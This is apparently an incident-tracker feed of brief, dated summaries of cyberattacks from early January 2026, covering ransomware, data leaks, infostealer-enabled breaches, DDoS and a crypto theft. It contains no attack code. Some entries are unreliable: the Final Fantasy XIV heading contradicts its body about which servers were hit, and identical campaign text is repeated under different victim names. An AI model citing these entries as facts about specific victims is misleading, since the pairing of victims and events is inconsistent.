Cressi
January 8, 2026
•[ ransomware, data leak, leak site ]
Cybernews reported that the ransomware group Qilin claimed responsibility for an attack on Cressi, an Italian diving equipment manufacturer, by posting a ransom entry on its leak site on January 8, 2026. The report notes that at that stage it was unclear what data (if any) had been accessed or exfiltrated and that the group had not published data samples or set a countdown timer. As reported, the main confirmed indicator is the groups claim and listing on the leak site; independent confirmation of encryption, downtime, or data theft was not provided in the article.
At least one Telecom company in South Asia
January 8, 2026
•[ espionage, malware, threat intelligence ]
The Hacker News summarized Cisco Talos research attributing espionage-focused intrusions to a China-nexus actor tracked as UAT-7290. The campaign reportedly targets telecom entities in South Asia and Southeastern Europe, performing extensive reconnaissance followed by compromise activity that can lead to deployment of malware families including RushDrop, DriveSwitch, and SilentRaid. The article is threat-intelligence reporting focused on actor behavior, tooling, and geographic targeting, and it does not provide a bounded, single victim incident record with confirmed impact metrics (e.g., downtime or specific data stolen) for one named organization.
Truebit
January 8, 2026
•[ cryptocurrency theft, smart contract exploit, blockchain security ]
The Record reported that hackers stole more than $26 million in cryptocurrency from the Truebit platform on Thursday (January 8, 2026). Truebit said it became aware of a security incident involving one or more malicious actors and urged users not to interact with the affected smart contract. Blockchain security firms tracked 8,535 ETH taken (reported as about $26.44 million). The report frames the event as a major early-2026 crypto theft affecting Truebits on-chain assets, with ongoing law-enforcement contact and incident response actions mentioned, but without detailing the precise exploit mechanism in the article text provided.
Instagram
January 7, 2026
•[ data leak, scraping ]
In January 2026, data allegedly scraped via an Instagram API was posted to a popular hacking forum. The dataset contained 17M rows of public Instagram information, including usernames, display names, account IDs, and in some cases, geolocation data. Of these records, 6.2M included an associated email address, and some also contained a phone number. The scraped data appears to be unrelated to password reset requests initiated on the platform, despite coinciding in timeframe. There is no evidence that passwords or other sensitive data were compromised.
Panera Bread
January 7, 2026
•[ ransomware, data leak ]
In January 2026, Panera Bread suffered a data breach that exposed 14M records. After an attempted extortion failed, the attackers published the data publicly, which included 5.1M unique email addresses along with associated account information such as names, phone numbers and physical addresses. Panera Bread subsequently confirmed that "the data involved is contact information" and that authorities were notified.
Universidad Nacional Autónoma de México
January 7, 2026
•[ unauthorized intrusion, incident response, system downtime ]
Universidad Nacional Autnoma de Mxico confirmed an unauthorized intrusion into a small number of its information systems in early January 2026. The university stated that five systems were affected and temporarily taken offline as a precautionary measure, that incident response protocols were activated, and that there was no evidence of theft or extraction of personal data belonging to students, faculty, or staff at the time of reporting.
Metro Pet Vet
January 7, 2026
•[ ransomware, data breach, technical difficulties ]
A Lancaster County veterinary practice (Metro Pet Vet) reported it was hit by a ransomware attack after several days of technical issues. The office said Monday and Tuesday it experienced major technical difficulties, including its router stopping, and by Wednesday morning ransomware was detected and the practice lost access to its server. Staff reported they could not access pet vaccine and medication histories and had to operate like 40 years ago using paper while continuing to treat animals and relying on an app for scheduling. The practice stated no credit card or Social Security information was stored on the affected server, but client phone numbers and addresses were stored there, and it expected recovery work to continue into the following week.
Veenkoloniaal Museum (Veendam)
January 7, 2026
•[ ransomware, unauthorized access, data theft ]
The Veenkoloniaal Museum in Veendam experienced a ransomware incident discovered on January 7, 2026, in which the LockBit group gained unauthorized access to systems. Data was stolen and files were rendered inaccessible, affecting digital records and image archives. Individuals whose personal data was involved were notified. The museum restored systems from backups and declined to negotiate with the attackers.
Anchorage Police Department via Whitebox Technologies
January 7, 2026
•[ security incident, third-party risk, data migration ]
Anchorage Police Department reported it took immediate containment actions after being alerted on January 7, 2026 to a security incident affecting one of its technology service providers, Whitebox Technologies (a data migration firm). According to reporting cited in the post, the Citys IT department shut down the relevant Anchorage Police Department servers and disabled the vendors access along with all third-party service provider access while incident response work continued. As of the report date, no ransomware group had publicly claimed responsibility and there was no public statement from the vendor. Public reporting did not confirm whether any APD data was accessed or exfiltrated, but it confirms operational disruption via server shutdown and access suspension.
Global-e
January 7, 2026
•[ data exposure, third-party compromise, unauthorized access ]
Reporting aggregated by DataBreaches.Net indicates Ledger was impacted by a data exposure incident involving its third-party payment processor, Global-e. The report describes an email notification stating that an unauthorized party accessed Global-es cloud system and obtained Ledger customers personal details, including names and contact information associated with orders. The notification did not specify when the access occurred, how many Ledger customers were affected, or whether additional data types (e.g., payment details) were involved. The incident is treated as a third-party compromise affecting Ledger customer data.
Iberia Airlines
January 7, 2026
•[ infostealer, malware, credential theft ]
TechRadar and HackRead summarized Hudson Rock research describing a campaign in which an actor using the alias Zestix (aka Sentap) leveraged credentials harvested by infostealer malware (e.g., RedLine, Lumma, Vidar) to access corporate cloud instances where multi-factor authentication was not enforced. Reporting stated the attacker obtained and attempted to auction or sell large volumes of sensitive corporate files from roughly 50 enterprises worldwide, with at least one victim reportedly losing on the order of 139GB of data. Specific victim impacts vary by organization, and the timing of initial credential theft was not fully specified.
CRRC MA
January 7, 2026
•[ credential theft, information-stealer malware, initial access broker ]
Reporting summarizing Hudson Rock research described an initial access broker believed to be an Iranian national operating under the aliases Zestix and Sentap who repeatedly accessed enterprise file repositories using credentials harvested by information-stealer malware (including RedLine, Lumma, and Vidar). Instead of exploiting a single company-specific vulnerability, the actor leveraged stolen usernames/passwords (some sitting in logs for years) to log into cloud/file-transfer environments lacking multi-factor authentication. The actor was described as exfiltrating large volumes of sensitive corporate data (examples referenced include aviation safety manuals, energy/utility mapping and infrastructure files, and medical/police-related records), then auctioning datasets or selling access on closed forums. Because the article describes a cross-victim pattern/campaign rather than one named-victim incident, this record is coded at the campaign level for a single-actor series of breaches.
Higham Lane School
January 7, 2026
•[ cyberattack, operational disruption, IT outage ]
Cybernews reported that Higham Lane School, a secondary school in Nuneaton, England, temporarily closed due to a cyberattack. According to the headteachers message to parents cited in the article, the school took all IT systems and digital services completely offline as a precaution, including telephones, email, servers, and the schools management system. The report does not identify the threat actor, method of intrusion, or whether data was accessed; the primary confirmed impact is operational disruption and loss of communications/management systems while the school responded.
At least one Booking.com user
January 7, 2026
•[ phishing, social engineering, malware ]
Research summarized by Cybernews described a ClickFix social-engineering campaign abusing Booking.com branding. Victims receive phishing emails about a cancelled reservation and a large charge; clicking through leads to a fake Booking.com page with a fake refresh flow and a simulated Blue Screen of Death. The page instructs the user to paste/run a malicious script (PowerShell) via Windows Run, which then fetches and executes remote code, disables Windows Defender, and establishes persistence with C2 connectivity. The link is campaign/threat-intel reporting and does not provide a single confirmed victim organization or a bounded incident count, but it describes successful infections driven by user-executed commands.
40 Danish websites (ministries, municipalities, businesses; incl. Ministry of Foreign Affairs and Rejsekort named in reporting)
January 7, 2026
•[ DDoS, Russian hacker groups, politically motivated disruption ]
Reporting cited by Denmarks CPH Post said Russian hacker groups carried out DDoS attacks over the prior month against around 40 Danish websites belonging to ministries, municipalities, and companies. The attacks aimed to overload systems and made several sites inaccessible for hours. The report referenced affected entities including Denmarks Ministry of Foreign Affairs and Rejsekort, consistent with politically motivated disruption rather than data theft.
OpenLoop Health
January 7, 2026
•[ data leak, unauthorized access, medical information ]
OpenLoop Health disclosed that an unauthorized third party accessed certain systems between January 7 and January 8, 2026 and removed files containing patient personal and medical information.
Final Fantasy 14's European or Asian servers
January 6, 2026
•[ DDoS attack, service disruption, distributed denial-of-service ]
Reporting described sustained distributed denial-of-service (DDoS) attacks disrupting Final Fantasy XIVs North American servers during the launch window for a newly released savage raid tier. Players reported frequent disconnects and unstable service during peak playtimes, and community tracking cited repeated incidents throughout the day, including reports of around 15 disruptions in a single day. The disruptions affected progression and organized play and persisted over multiple days.
NMCV Business LLC
January 6, 2026
•[ information-stealer malware, initial access broker, credential harvesting ]
SecurityWeek summarized Hudson Rock findings that dozens of major breaches were tied to a single initial access broker using credentials harvested by information-stealer malware (RedLine, Lumma, Vidar). The actor (Zestix/Sentap) was described as using stolen employee credentials to access enterprise file-transfer or file-sharing instances (ShareFile, OwnCloud, Nextcloud), with the lack of MFA being the key enabling control failure. The reporting characterized the actor as both stealing data and monetizing it by selling datasets and/or selling access on closed Russian-language forums, with victim organizations spanning aerospace, government infrastructure, legal, robotics, healthcare and other sectors.
Australian NBN
January 6, 2026
•[ Initial Access Broker, Information-stealer malware, RedLine ]
SecurityWeek summarized Hudson Rock findings that dozens of major breaches were tied to a single initial access broker using credentials harvested by information-stealer malware (RedLine, Lumma, Vidar). The actor (Zestix/Sentap) was described as using stolen employee credentials to access enterprise file-transfer or file-sharing instances (ShareFile, OwnCloud, Nextcloud), with the lack of MFA being the key enabling control failure. The reporting characterized the actor as both stealing data and monetizing it by selling datasets and/or selling access on closed Russian-language forums, with victim organizations spanning aerospace, government infrastructure, legal, robotics, healthcare and other sectors. Because the report is multi-victim and campaign-focused rather than a single victims disclosure, this record is captured as a single-actor campaign entry.
